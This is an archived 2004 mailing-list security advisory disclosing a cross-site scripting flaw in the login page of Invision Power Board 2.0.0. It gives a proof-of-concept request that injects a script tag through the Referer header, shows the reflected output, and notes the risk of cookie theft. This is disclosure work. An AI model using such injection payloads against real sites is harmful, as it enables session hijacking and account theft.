| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 5 Oct 2004 22:53:12 +0400 From: "Alexander Antipov" <Antipov@...urityLab.ru> To: <bugtraq@...urityfocus.com> Cc: <full-disclosure@...ts.netsys.com> Subject: [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board Date: 5.10.2004 Severity: Low Application: Invision Power Board v2.0.0 Platform: PHP I. DESCRIPTION An input validation vulnerability was found in Invision Power Board. A remote user can conduct Cross site scripting attack. 1. GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0 Referer: "'/><script>alert()</script> Result <...> index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> <input type="hidden" name="referer" value="\"\'/><script>alert()</script>" /> <...> II. IMPACT A remote user can access the target user's cookies (including authentication cookies). III. SOLUTION Not available currently. IV. VENDOR FIX/RESPONSE n/a V. CREDIT This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting). _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists